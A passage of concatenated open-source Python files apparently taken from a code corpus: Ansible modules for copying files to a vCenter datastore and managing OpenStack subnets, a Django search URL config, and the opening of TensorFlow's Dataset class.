# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vsphere_copy
short_description: Copy a file to a vCenter datastore
description:
- Upload files to a vCenter datastore
version_added: 2.0
author: Dag Wieers (@dagwieers) <dag@wieers.com>
options:
host:
description:
- The vCenter server on which the datastore is available.
required: true
login:
description:
- The login name to authenticate on the vCenter server.
required: true
password:
description:
- The password to authenticate on the vCenter server.
required: true
src:
description:
- The file to push to vCenter
required: true
datacenter:
description:
- The datacenter on the vCenter server that holds the datastore.
required: true
datastore:
description:
- The datastore on the vCenter server to push files to.
required: true
path:
description:
- The file to push to the datastore on the vCenter server.
required: true
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
set to C(no) when no other option exists.
required: false
default: 'yes'
choices: ['yes', 'no']
notes:
- "This module ought to be run from a system that can access vCenter directly and has the file to transfer.
It can be the normal remote target or you can change it either by using C(transport: local) or using C(delegate_to)."
- Tested on vSphere 5.5
'''
EXAMPLES = '''
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /some/local/file
datacenter: DC1 Someplace
datastore: datastore1
path: some/remote/file
transport: local
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /other/local/file
datacenter: DC2 Someplace
datastore: datastore2
path: other/remote/file
delegate_to: other_system
'''
import atexit
import urllib
import mmap
import errno
import socket
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.urls import open_url
def vmware_path(datastore, datacenter, path):
    """Construct a URL path that vSphere accepts reliably.

    Returns ``/folder/<path>?dsName=<datastore>[&dcPath=<datacenter>]``.
    The leading "/folder/" prefix guarantees the result starts with "/",
    so no extra normalization is needed.
    """
    path = "/folder/%s" % path.lstrip("/")
    # Due to a software bug in vSphere, it fails to handle ampersand in
    # datacenter names.  The solution is to do what vSphere does (when
    # browsing) and double-encode ampersands: '&' -> '%26' here, which
    # urlencode then escapes again to '%2526'.
    if datacenter:
        datacenter = datacenter.replace('&', '%26')
    params = dict(dsName=datastore)
    if datacenter:
        params["dcPath"] = datacenter
    # urllib.urlencode moved to urllib.parse.urlencode in Python 3.
    try:
        from urllib import urlencode  # Python 2
    except ImportError:
        from urllib.parse import urlencode  # Python 3
    return "%s?%s" % (path, urlencode(params))
def main():
    """Upload a local file to a vCenter datastore via the /folder HTTP API."""
    module = AnsibleModule(
        argument_spec = dict(
            host = dict(required=True, aliases=[ 'hostname' ]),
            login = dict(required=True, aliases=[ 'username' ]),
            password = dict(required=True, no_log=True),
            src = dict(required=True, aliases=[ 'name' ]),
            datacenter = dict(required=True),
            datastore = dict(required=True),
            dest = dict(required=True, aliases=[ 'path' ]),
            validate_certs = dict(required=False, default=True, type='bool'),
        ),
        # Implementing check-mode using HEAD is impossible, since size/date is not 100% reliable
        supports_check_mode = False,
    )

    host = module.params.get('host')
    login = module.params.get('login')
    password = module.params.get('password')
    src = module.params.get('src')
    datacenter = module.params.get('datacenter')
    datastore = module.params.get('datastore')
    dest = module.params.get('dest')
    validate_certs = module.params.get('validate_certs')

    # Memory-map the source file so large files are streamed to the request
    # without being read fully into a Python string; atexit guarantees the
    # handles are released even on fail_json exits.
    fd = open(src, "rb")
    atexit.register(fd.close)
    data = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_READ)
    atexit.register(data.close)

    remote_path = vmware_path(datastore, datacenter, dest)
    url = 'https://%s%s' % (host, remote_path)

    headers = {
        "Content-Type": "application/octet-stream",
        "Content-Length": str(len(data)),
    }

    try:
        r = open_url(url, data=data, headers=headers, method='PUT',
                     url_username=login, url_password=password, validate_certs=validate_certs,
                     force_basic_auth=True)
    except socket.error:
        # NOTE(review): the e[0] indexing assumes Python 2 style exception
        # tuples; on Python 3 socket.error is OSError and is not indexable —
        # confirm which interpreters this module must support.
        e = get_exception()
        if isinstance(e.args, tuple) and e[0] == errno.ECONNRESET:
            # VSphere resets connection if the file is in use and cannot be replaced
            module.fail_json(msg='Failed to upload, image probably in use', status=None, errno=e[0], reason=str(e), url=url)
        else:
            module.fail_json(msg=str(e), status=None, errno=e[0], reason=str(e), url=url)
    except Exception:
        e = get_exception()
        error_code = -1
        # NOTE(review): indexing e[0] can raise IndexError/TypeError, which
        # this KeyError handler does not catch — confirm intended.
        try:
            if isinstance(e[0], int):
                error_code = e[0]
        except KeyError:
            pass
        module.fail_json(msg=str(e), status=None, errno=error_code, reason=str(e), url=url)

    status = r.getcode()
    if 200 <= status < 300:
        module.exit_json(changed=True, status=status, reason=r.msg, url=url)
    else:
        length = r.headers.get('content-length', None)
        if r.headers.get('transfer-encoding', '').lower() == 'chunked':
            chunked = 1
        else:
            chunked = 0
        module.fail_json(msg='Failed to upload', errno=None, status=status, reason=r.msg, length=length, headers=dict(r.headers), chunked=chunked, url=url)


if __name__ == '__main__':
    main()
| gpl-3.0 |
skg-net/ansible | lib/ansible/modules/cloud/openstack/os_subnet.py | 27 | 12816 | #!/usr/bin/python
# coding: utf-8 -*-
# (c) 2013, Benno Joy <benno@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_subnet
short_description: Add/Remove subnet to an OpenStack network
extends_documentation_fragment: openstack
version_added: "2.0"
author: "Monty Taylor (@emonty)"
description:
- Add or Remove a subnet to an OpenStack network
options:
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
network_name:
description:
- Name of the network to which the subnet should be attached
- Required when I(state) is 'present'
name:
description:
- The name of the subnet that should be created. Although Neutron
allows for non-unique subnet names, this module enforces subnet
name uniqueness.
required: true
cidr:
description:
- The CIDR representation of the subnet that should be assigned to
the subnet. Required when I(state) is 'present' and a subnetpool
is not specified.
ip_version:
description:
- The IP version of the subnet 4 or 6
default: 4
enable_dhcp:
description:
- Whether DHCP should be enabled for this subnet.
type: bool
default: 'yes'
gateway_ip:
description:
- The ip that would be assigned to the gateway for this subnet
no_gateway_ip:
description:
- The gateway IP would not be assigned for this subnet
type: bool
default: 'no'
version_added: "2.2"
dns_nameservers:
description:
- List of DNS nameservers for this subnet.
allocation_pool_start:
description:
- From the subnet pool the starting address from which the IP should
be allocated.
allocation_pool_end:
description:
- From the subnet pool the last IP that should be assigned to the
virtual machines.
host_routes:
description:
- A list of host route dictionaries for the subnet.
ipv6_ra_mode:
description:
- IPv6 router advertisement mode
choices: ['dhcpv6-stateful', 'dhcpv6-stateless', 'slaac']
ipv6_address_mode:
description:
- IPv6 address mode
choices: ['dhcpv6-stateful', 'dhcpv6-stateless', 'slaac']
use_default_subnetpool:
description:
- Use the default subnetpool for I(ip_version) to obtain a CIDR.
type: bool
default: 'no'
project:
description:
- Project name or ID containing the subnet (name admin-only)
version_added: "2.1"
availability_zone:
description:
- Ignored. Present for backwards compatibility
extra_specs:
description:
- Dictionary with extra key/value pairs passed to the API
required: false
default: {}
version_added: "2.7"
requirements:
- "python >= 2.7"
- "openstacksdk"
'''
EXAMPLES = '''
# Create a new (or update an existing) subnet on the specified network
- os_subnet:
state: present
network_name: network1
name: net1subnet
cidr: 192.168.0.0/24
dns_nameservers:
- 8.8.8.7
- 8.8.8.8
host_routes:
- destination: 0.0.0.0/0
nexthop: 12.34.56.78
- destination: 192.168.0.0/24
nexthop: 192.168.0.1
# Delete a subnet
- os_subnet:
state: absent
name: net1subnet
# Create an ipv6 stateless subnet
- os_subnet:
state: present
name: intv6
network_name: internal
ip_version: 6
cidr: 2db8:1::/64
dns_nameservers:
- 2001:4860:4860::8888
- 2001:4860:4860::8844
ipv6_ra_mode: dhcpv6-stateless
ipv6_address_mode: dhcpv6-stateless
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _can_update(subnet, module, cloud):
    """Check for differences in non-updatable values"""
    # Fail fast when the playbook requests a change Neutron cannot apply to
    # an existing subnet: its network, IP version, or IPv6 modes.
    network_name = module.params['network_name']
    ip_version = int(module.params['ip_version'])
    ipv6_ra_mode = module.params['ipv6_ra_mode']
    ipv6_a_mode = module.params['ipv6_address_mode']
    if network_name:
        network = cloud.get_network(network_name)
        if network:
            netid = network['id']
        else:
            module.fail_json(msg='No network found for %s' % network_name)
        if netid != subnet['network_id']:
            module.fail_json(msg='Cannot update network_name in existing \
subnet')
    if ip_version and subnet['ip_version'] != ip_version:
        module.fail_json(msg='Cannot update ip_version in existing subnet')
    if ipv6_ra_mode and subnet.get('ipv6_ra_mode', None) != ipv6_ra_mode:
        module.fail_json(msg='Cannot update ipv6_ra_mode in existing subnet')
    if ipv6_a_mode and subnet.get('ipv6_address_mode', None) != ipv6_a_mode:
        module.fail_json(msg='Cannot update ipv6_address_mode in existing \
subnet')
def _needs_update(subnet, module, cloud):
    """Check for differences in the updatable values.

    Returns True when any updatable attribute of the existing *subnet*
    differs from the module parameters.  Non-updatable differences cause an
    immediate fail_json via _can_update().
    """
    # First check if we are trying to update something we're not allowed to
    _can_update(subnet, module, cloud)

    # now check for the things we are allowed to update
    enable_dhcp = module.params['enable_dhcp']
    subnet_name = module.params['name']
    pool_start = module.params['allocation_pool_start']
    pool_end = module.params['allocation_pool_end']
    gateway_ip = module.params['gateway_ip']
    no_gateway_ip = module.params['no_gateway_ip']
    dns = module.params['dns_nameservers']
    host_routes = module.params['host_routes']
    # Guard against subnets created without an allocation pool; the original
    # indexed [0] unconditionally and raised IndexError for them.
    pools = subnet.get('allocation_pools') or []
    curr_pool = pools[0] if pools else {}

    if subnet['enable_dhcp'] != enable_dhcp:
        return True
    if subnet_name and subnet['name'] != subnet_name:
        return True
    if pool_start and curr_pool.get('start') != pool_start:
        return True
    if pool_end and curr_pool.get('end') != pool_end:
        return True
    if gateway_ip and subnet['gateway_ip'] != gateway_ip:
        return True
    if dns and sorted(subnet['dns_nameservers']) != sorted(dns):
        return True
    if host_routes:
        # Compare route lists order-insensitively.  Sorting the route dicts
        # directly raises TypeError on Python 3, so sort by a canonical
        # tuple of their items instead.
        def _route_key(route):
            return sorted(route.items())
        curr_hr = sorted(subnet['host_routes'], key=_route_key)
        new_hr = sorted(host_routes, key=_route_key)
        if curr_hr != new_hr:
            return True
    if no_gateway_ip and subnet['gateway_ip']:
        return True
    return False
def _system_state_change(module, subnet, cloud):
    """Return True when applying the requested state would change the cloud."""
    state = module.params['state']
    if state == 'present':
        # Creating a missing subnet is a change; otherwise a change is
        # needed only when an updatable attribute differs.
        return (not subnet) or _needs_update(subnet, module, cloud)
    # 'absent': deleting is a change only when the subnet exists.
    return state == 'absent' and bool(subnet)
def main():
    """Ansible entry point: create, update or delete an OpenStack subnet."""
    ipv6_mode_choices = ['dhcpv6-stateful', 'dhcpv6-stateless', 'slaac']
    argument_spec = openstack_full_argument_spec(
        name=dict(required=True),
        network_name=dict(default=None),
        cidr=dict(default=None),
        ip_version=dict(default='4', choices=['4', '6']),
        enable_dhcp=dict(default='true', type='bool'),
        gateway_ip=dict(default=None),
        no_gateway_ip=dict(default=False, type='bool'),
        dns_nameservers=dict(default=None, type='list'),
        allocation_pool_start=dict(default=None),
        allocation_pool_end=dict(default=None),
        host_routes=dict(default=None, type='list'),
        # Fixed: the original passed "choice=", a kwarg AnsibleModule
        # ignores, so the ipv6 mode values were never validated.
        ipv6_ra_mode=dict(default=None, choices=ipv6_mode_choices),
        ipv6_address_mode=dict(default=None, choices=ipv6_mode_choices),
        use_default_subnetpool=dict(default=False, type='bool'),
        extra_specs=dict(required=False, default=dict(), type='dict'),
        state=dict(default='present', choices=['absent', 'present']),
        project=dict(default=None)
    )

    module_kwargs = openstack_module_kwargs()
    module = AnsibleModule(argument_spec,
                           supports_check_mode=True,
                           **module_kwargs)

    state = module.params['state']
    network_name = module.params['network_name']
    cidr = module.params['cidr']
    ip_version = module.params['ip_version']
    enable_dhcp = module.params['enable_dhcp']
    subnet_name = module.params['name']
    gateway_ip = module.params['gateway_ip']
    no_gateway_ip = module.params['no_gateway_ip']
    dns = module.params['dns_nameservers']
    pool_start = module.params['allocation_pool_start']
    pool_end = module.params['allocation_pool_end']
    host_routes = module.params['host_routes']
    ipv6_ra_mode = module.params['ipv6_ra_mode']
    ipv6_a_mode = module.params['ipv6_address_mode']
    use_default_subnetpool = module.params['use_default_subnetpool']
    # pop() removes 'project' from params so it is handled here and not
    # treated as a subnet attribute later on.
    project = module.params.pop('project')
    extra_specs = module.params['extra_specs']

    # Check for required parameters when state == 'present'
    if state == 'present':
        if not module.params['network_name']:
            module.fail_json(msg='network_name required with present state')
        if not module.params['cidr'] and not use_default_subnetpool:
            module.fail_json(msg='cidr or use_default_subnetpool required '
                                 'with present state')

    # Both ends of the allocation pool must be given together.
    if pool_start and pool_end:
        pool = [dict(start=pool_start, end=pool_end)]
    elif pool_start or pool_end:
        module.fail_json(msg='allocation pool requires start and end values')
    else:
        pool = None

    if no_gateway_ip and gateway_ip:
        module.fail_json(msg='no_gateway_ip is not allowed with gateway_ip')

    sdk, cloud = openstack_cloud_from_module(module)
    try:
        # Scope the subnet lookup to the requested project, if any.
        if project is not None:
            proj = cloud.get_project(project)
            if proj is None:
                module.fail_json(msg='Project %s could not be found' % project)
            project_id = proj['id']
            filters = {'tenant_id': project_id}
        else:
            project_id = None
            filters = None

        subnet = cloud.get_subnet(subnet_name, filters=filters)

        if module.check_mode:
            module.exit_json(changed=_system_state_change(module, subnet,
                                                          cloud))

        if state == 'present':
            if not subnet:
                kwargs = dict(
                    cidr=cidr,
                    ip_version=ip_version,
                    enable_dhcp=enable_dhcp,
                    subnet_name=subnet_name,
                    gateway_ip=gateway_ip,
                    disable_gateway_ip=no_gateway_ip,
                    dns_nameservers=dns,
                    allocation_pools=pool,
                    host_routes=host_routes,
                    ipv6_ra_mode=ipv6_ra_mode,
                    ipv6_address_mode=ipv6_a_mode,
                    tenant_id=project_id)
                # extra_specs may add new keys but must not silently
                # override the explicit module parameters above.
                dup_args = set(kwargs.keys()) & set(extra_specs.keys())
                if dup_args:
                    raise ValueError('Duplicate key(s) {0} in extra_specs'
                                     .format(list(dup_args)))
                if use_default_subnetpool:
                    kwargs['use_default_subnetpool'] = use_default_subnetpool
                kwargs = dict(kwargs, **extra_specs)
                subnet = cloud.create_subnet(network_name, **kwargs)
                changed = True
            else:
                if _needs_update(subnet, module, cloud):
                    cloud.update_subnet(subnet['id'],
                                        subnet_name=subnet_name,
                                        enable_dhcp=enable_dhcp,
                                        gateway_ip=gateway_ip,
                                        disable_gateway_ip=no_gateway_ip,
                                        dns_nameservers=dns,
                                        allocation_pools=pool,
                                        host_routes=host_routes)
                    changed = True
                else:
                    changed = False
            module.exit_json(changed=changed,
                             subnet=subnet,
                             id=subnet['id'])

        elif state == 'absent':
            if not subnet:
                changed = False
            else:
                changed = True
                cloud.delete_subnet(subnet_name)
            module.exit_json(changed=changed)

    except sdk.exceptions.OpenStackCloudException as e:
        module.fail_json(msg=str(e))


if __name__ == '__main__':
    main()
| gpl-3.0 |
gnowgi/gnowsys-studio | objectapp/urls/search.py | 2 | 3476 | # Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This project incorporates work covered by the following copyright and permission notice:
# Copyright (c) 2009, Julien Fache
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the author nor the names of other
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
# Copyright (c) 2011, 2012 Free Software Foundation
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Urls for the Objectapp search"""
from django.conf.urls.defaults import url
from django.conf.urls.defaults import patterns

# Single route: the bare search URL dispatches to the nodes_search view.
urlpatterns = patterns('objectapp.views.search',
                       url(r'^$', 'nodes_search', name='nodes_search'),
                       )
| agpl-3.0 |
horance-liu/tensorflow | tensorflow/python/data/ops/dataset_ops.py | 2 | 60412 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrappers for Datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import threading
import numpy as np
import six
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.util import nest
from tensorflow.python.data.util import sparse
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor as sparse_tensor_lib
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import gen_dataset_ops
from tensorflow.python.ops import gen_io_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import script_ops
class Dataset(object):
  """Represents a potentially large set of elements.

  A `Dataset` can be used to represent an input pipeline as a
  collection of elements (nested structures of tensors) and a "logical
  plan" of transformations that act on those elements.
  """
  __metaclass__ = abc.ABCMeta

  def __init__(self):
    pass

  @abc.abstractmethod
  def _as_variant_tensor(self):
    """Creates a scalar `tf.Tensor` of `tf.variant` representing this dataset.

    Returns:
      A scalar `tf.Tensor` of `tf.variant` type, which represents this dataset.
    """
    raise NotImplementedError("Dataset._as_variant_tensor")

  def make_initializable_iterator(self, shared_name=None):
    """Creates an `Iterator` for enumerating the elements of this dataset.

    Note: The returned iterator will be in an uninitialized state,
    and you must run the `iterator.initializer` operation before using it:

    ```python
    dataset = ...
    iterator = dataset.make_initializable_iterator()
    # ...
    sess.run(iterator.initializer)
    ```

    Args:
      shared_name: (Optional.) If non-empty, the returned iterator will be
        shared under the given name across multiple sessions that share the
        same devices (e.g. when using a remote server).

    Returns:
      An `Iterator` over the elements of this dataset.

    Raises:
      RuntimeError: If eager execution is enabled.
    """
    if context.in_eager_mode():
      raise RuntimeError(
          "dataset.make_initializable_iterator is not supported when eager "
          "execution is enabled.")
    if shared_name is None:
      shared_name = ""
    iterator_resource = gen_dataset_ops.iterator(
        container="",
        shared_name=shared_name,
        output_types=nest.flatten(
            sparse.unwrap_sparse_types(self.output_types)),
        output_shapes=nest.flatten(self.output_shapes))
    # The MakeIterator op must run on the same device as the iterator
    # resource it initializes.
    with ops.colocate_with(iterator_resource):
      initializer = gen_dataset_ops.make_iterator(self._as_variant_tensor(),
                                                  iterator_resource)
    return iterator_ops.Iterator(iterator_resource, initializer,
                                 self.output_types, self.output_shapes)

  def make_one_shot_iterator(self):
    """Creates an `Iterator` for enumerating the elements of this dataset.

    Note: The returned iterator will be initialized automatically.
    A "one-shot" iterator does not currently support re-initialization.

    Returns:
      An `Iterator` over the elements of this dataset.

    Raises:
      RuntimeError: If eager execution is enabled.
    """
    if context.in_eager_mode():
      raise RuntimeError(
          "dataset.make_one_shot_iterator is not supported when eager "
          "execution is enabled.")
    # NOTE(mrry): We capture by value here to ensure that `_make_dataset()` is
    # a 0-argument function.
    @function.Defun(capture_by_value=True)
    def _make_dataset():
      return self._as_variant_tensor()  # pylint: disable=protected-access

    try:
      _make_dataset.add_to_graph(ops.get_default_graph())
    except ValueError as err:
      if "Cannot capture a stateful node" in str(err):
        raise ValueError(
            "Failed to create a one-shot iterator for a dataset. "
            "`Dataset.make_one_shot_iterator()` does not support datasets that "
            "capture stateful objects, such as a `Variable` or `LookupTable`. "
            "In these cases, use `Dataset.make_initializable_iterator()`. "
            "(Original error: %s)" % err)
      else:
        six.reraise(ValueError, err)

    return iterator_ops.Iterator(
        gen_dataset_ops.one_shot_iterator(
            dataset_factory=_make_dataset,
            output_types=nest.flatten(
                sparse.unwrap_sparse_types(self.output_types)),
            output_shapes=nest.flatten(self.output_shapes)), None,
        self.output_types, self.output_shapes)

  @abc.abstractproperty
  def output_shapes(self):
    """Returns the shape of each component of an element of this dataset.

    Returns:
      A nested structure of `tf.TensorShape` objects corresponding to each
      component of an element of this dataset.
    """
    raise NotImplementedError("Dataset.output_shapes")

  @abc.abstractproperty
  def output_types(self):
    """Returns the type of each component of an element of this dataset.

    Returns:
      A nested structure of `tf.DType` (or `tf.data.SparseType`) objects
      corresponding to each `tf.Tensor` (or `tf.SparseTensor`) component of an
      element of this dataset.
    """
    raise NotImplementedError("Dataset.output_types")

  def __repr__(self):
    output_shapes = nest.map_structure(str, self.output_shapes)
    output_shapes = str(output_shapes).replace("'", "")
    output_types = nest.map_structure(repr, self.output_types)
    output_types = str(output_types).replace("'", "")
    return ("<%s shapes: %s, types: %s>" % (type(self).__name__, output_shapes,
                                            output_types))

  @staticmethod
  def from_tensors(tensors):
    """Creates a `Dataset` with a single element, comprising the given tensors.

    Args:
      tensors: A nested structure of tensors.

    Returns:
      A `Dataset`.
    """
    return TensorDataset(tensors)

  @staticmethod
  def from_tensor_slices(tensors):
    """Creates a `Dataset` whose elements are slices of the given tensors.

    Args:
      tensors: A nested structure of tensors, each having the same size in the
        0th dimension.

    Returns:
      A `Dataset`.
    """
    return TensorSliceDataset(tensors)

  @staticmethod
  def from_sparse_tensor_slices(sparse_tensor):
    """Splits each rank-N `tf.SparseTensor` in this dataset row-wise.

    Args:
      sparse_tensor: A `tf.SparseTensor`.

    Returns:
      A `Dataset` of rank-(N-1) sparse tensors.
    """
    return SparseTensorSliceDataset(sparse_tensor)

  class _GeneratorState(object):
    """Stores outstanding iterators created from a Python generator.

    This class keeps track of potentially multiple iterators that may have
    been created from a generator, e.g. in the case that the dataset is
    repeated, or nested within a parallel computation.
    """

    def __init__(self, generator):
      self._generator = generator
      self._lock = threading.Lock()
      self._next_id = 0  # GUARDED_BY(self._lock)
      self._iterators = collections.defaultdict(lambda: iter(generator()))

    def get_next_id(self):
      with self._lock:
        ret = self._next_id
        self._next_id += 1
      # NOTE(mrry): Explicitly create an array of `np.int64` because implicit
      # casting in `py_func()` will create an array of `np.int32` on Windows,
      # leading to a runtime error.
      return np.array(ret, dtype=np.int64)

    def get_iterator(self, iterator_id):
      return self._iterators[iterator_id]

    def iterator_completed(self, iterator_id):
      del self._iterators[iterator_id]

  @staticmethod
  def from_generator(generator, output_types, output_shapes=None):
    """Creates a `Dataset` whose elements are generated by `generator`.

    The `generator` argument must be a callable object that returns
    an object that support the `iter()` protocol (e.g. a generator function).
    The elements generated by `generator` must be compatible with the given
    `output_types` and (optional) `output_shapes` arguments.

    For example:

    ```python
    import itertools

    def gen():
      for i in itertools.count(1):
        yield (i, [1] * i)

    ds = Dataset.from_generator(
        gen, (tf.int64, tf.int64), (tf.TensorShape([]), tf.TensorShape([None])))
    value = ds.make_one_shot_iterator().get_next()

    sess.run(value)  # (1, array([1]))
    sess.run(value)  # (2, array([1, 1]))
    ```

    Args:
      generator: A callable object that takes no arguments and returns an
        object that supports the `iter()` protocol.
      output_types: A nested structure of `tf.DType` objects corresponding to
        each component of an element yielded by `generator`.
      output_shapes: (Optional.) A nested structure of `tf.TensorShape`
        objects corresponding to each component of an element yielded by
        `generator`.

    Returns:
      A `Dataset`.
    """
    if not callable(generator):
      raise TypeError("`generator` must be callable.")
    if output_shapes is None:
      # Default to fully-unknown shapes when none are provided.
      output_shapes = nest.map_structure(
          lambda _: tensor_shape.TensorShape(None), output_types)
    else:
      output_shapes = nest.map_structure_up_to(
          output_types, tensor_shape.as_shape, output_shapes)

    flattened_types = nest.flatten(output_types)
    flattened_shapes = nest.flatten(output_shapes)

    generator_state = Dataset._GeneratorState(generator)

    def get_iterator_id_map_fn(unused_dummy):
      """Creates a unique `iterator_id` for each pass over the dataset.

      The "iterator_id" disambiguates between multiple concurrently
      existing iterators.

      Args:
        unused_dummy: Ignored value.

      Returns:
        A `tf.int64` tensor whose value uniquely identifies an iterator in
        `generator_state`.
      """
      return script_ops.py_func(
          generator_state.get_next_id, [], dtypes.int64, stateful=True)

    def generator_map_fn(iterator_id_t):
      """Generates the next element from iterator with ID `iterator_id_t`.

      We map this function across an infinite repetition of the
      `iterator_id_t`, and raise `StopIteration` to terminate the iteration.

      Args:
        iterator_id_t: A `tf.int64` tensor whose value uniquely identifies
          the iterator in `generator_state` from which to generate an element.

      Returns:
        A nested structure of tensors representing an element from the iterator.
      """

      def generator_py_func(iterator_id):
        """A `py_func` that will be called to invoke the iterator."""
        try:
          values = next(generator_state.get_iterator(iterator_id))
        except StopIteration:
          generator_state.iterator_completed(iterator_id)
          raise StopIteration("Iteration finished.")

        # Use the same _convert function from the py_func() implementation to
        # convert the returned values to arrays early, so that we can inspect
        # their values.
        # pylint: disable=protected-access
        ret_arrays = [
            script_ops.FuncRegistry._convert(ret, dtype=dtype.as_numpy_dtype)
            for ret, dtype in zip(
                nest.flatten_up_to(output_types, values), flattened_types)
        ]
        # pylint: enable=protected-access

        # Additional type and shape checking to ensure that the components
        # of the generated element match the `output_types` and `output_shapes`
        # arguments.
        for (ret_array, expected_dtype, expected_shape) in zip(
            ret_arrays, flattened_types, flattened_shapes):
          if ret_array.dtype != expected_dtype.as_numpy_dtype:
            raise TypeError(
                "`generator` yielded an element of type %s where an element "
                "of type %s was expected." % (ret_array.dtype,
                                              expected_dtype.as_numpy_dtype))
          if not expected_shape.is_compatible_with(ret_array.shape):
            raise ValueError(
                "`generator` yielded an element of shape %s where an element "
                "of shape %s was expected." % (ret_array.shape, expected_shape))

        return ret_arrays

      flat_values = script_ops.py_func(
          generator_py_func, [iterator_id_t], flattened_types, stateful=True)

      # The `py_func()` op drops the inferred shapes, so we add them back in
      # here.
      if output_shapes is not None:
        for ret_t, shape in zip(flat_values, flattened_shapes):
          ret_t.set_shape(shape)

      return nest.pack_sequence_as(output_types, flat_values)

    # This function associates each traversal of `generator` with a unique
    # iterator ID.
    def flat_map_fn(iterator_id_t):
      # First, generate an infinite dataset containing the iterator ID repeated
      # forever.
      repeated_id = Dataset.from_tensors(iterator_id_t).repeat(None)

      # The `generator_map_fn` gets the next element from the iterator with the
      # relevant ID, and raises StopIteration when that iterator contains no
      # more elements.
      return repeated_id.map(generator_map_fn)

    # A single-element dataset that, each time it is evaluated, contains a
    # freshly-generated and unique (for the returned dataset) int64
    # ID that will be used to identify the appropriate Python state, which
    # is encapsulated in `generator_state`, and captured in
    # `get_iterator_id_map_fn`.
    dummy = 0
    id_dataset = Dataset.from_tensors(dummy).map(get_iterator_id_map_fn)

    # A dataset that contains all of the elements generated by a
    # single iterator created from `generator`, identified by the
    # iterator ID contained in `id_dataset`. Lifting the iteration
    # into a flat_map here enables multiple repetitions and/or nested
    # versions of the returned dataset to be created, because it forces
    # the generation of a new ID for each version.
    return id_dataset.flat_map(flat_map_fn)

  @staticmethod
  def range(*args):
    """Creates a `Dataset` of a step-separated range of values.

    For example:

    ```python
    Dataset.range(5) == [0, 1, 2, 3, 4]
    Dataset.range(2, 5) == [2, 3, 4]
    Dataset.range(1, 5, 2) == [1, 3]
    Dataset.range(1, 5, -2) == []
    Dataset.range(5, 1) == []
